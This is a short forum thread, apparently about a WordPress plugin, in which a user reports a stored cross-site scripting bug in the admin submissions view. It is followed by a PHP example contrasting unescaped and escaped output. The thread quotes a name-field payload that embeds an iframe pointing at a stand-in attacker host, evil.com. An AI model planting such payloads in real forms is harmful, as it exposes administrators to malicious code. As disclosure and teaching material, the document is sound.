Thread Starter
n0x00
(@n0x00)
Wicked! That's probably the quickest turnaround I've seen to date 🙂
Good work!
Thread Starter
n0x00
(@n0x00)
Oh sorry, are there any other types of POST requests?
Yes, I mean HTTP POST.
Thread Starter
n0x00
(@n0x00)
It's code injection; the specifics are in the POST request I submitted above.
I'm not sure what you're having trouble with, mate.
https://www.owasp.org/index.php/Code_Injection
If someone supplies HTML/code in the name fields, when the admin is viewing the submissions it will render the user-supplied code.
Badguy submits his name as 'MrEvil <iframe src="http://evil.com/">'.
When the admin or manager of that plugin reviews the submissions, it will treat the <iframe> as legitimate code and render it; if evil.com has malicious payloads (Java, JavaScript, Flash, Metasploit, whatever), they will get pushed in via the iframe, attacking authenticated users.
… do you need a video?
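The rendering bug the thread describes, shown as an added example that is not code from this thread or from the plugin being discussed: a stored submission's name field is written into an admin listing, first unescaped (the behaviour n0x00 reports) and then with output escaping applied. The `$submission` array, the `render_submission_*` functions and the table markup are assumptions for illustration; the sample name reuses the iframe string from the post above.

```php
<?php
// Added example (not from the thread or the plugin under discussion):
// rendering a stored form submission in an admin page, first the way the
// thread describes (raw output) and then with output escaping applied.

// Constructed sample submission, using the name payload from the thread.
$submission = [
    'name'  => 'MrEvil <iframe src="http://evil.com/"></iframe>',
    'email' => 'mrevil@example.invalid',
];

// Vulnerable: the stored value is concatenated into HTML untouched, so any
// markup the submitter included is parsed by the admin's browser.
function render_submission_vulnerable(array $s): string
{
    return '<tr><td>' . $s['name'] . '</td><td>' . $s['email'] . '</td></tr>';
}

// Hardened: every user-controlled value is HTML-escaped at the point of
// output. In a WordPress plugin the equivalent call is esc_html(); plain
// htmlspecialchars() is used here so the snippet runs outside WordPress.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_submission_safe(array $s): string
{
    return '<tr><td>' . esc($s['name']) . '</td><td>' . esc($s['email']) . '</td></tr>';
}

// Minimal check: the escaped rendering must not contain a live tag;
// the browser will show the literal text "<iframe ...>" instead of loading it.
$unsafe = render_submission_vulnerable($submission);
$safe   = render_submission_safe($submission);

echo "vulnerable: $unsafe\n";
echo "safe:       $safe\n";
echo (strpos($safe, '<iframe') === false) ? "escaping OK\n" : "escaping FAILED\n";
```

Run it with `php example.php`. The point is that escaping belongs at output time and must match the context: `htmlspecialchars()` (or `esc_html()` in WordPress) is right for text between tags, while a value placed inside an attribute or a script block needs the escaping function for that context instead.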